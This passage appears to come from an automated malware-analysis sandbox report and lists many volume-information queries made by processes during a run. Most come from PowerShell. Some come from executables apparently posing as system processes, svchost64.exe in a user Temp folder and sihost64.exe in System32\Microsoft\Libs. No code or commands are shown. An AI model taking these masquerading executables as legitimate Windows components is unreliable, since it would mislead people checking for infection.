Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Queries volume information: C:\Windows\System32\Microsoft\Libs\sihost64.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Queries volume information: C:\Windows\System32\Microsoft\Libs\sihost64.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
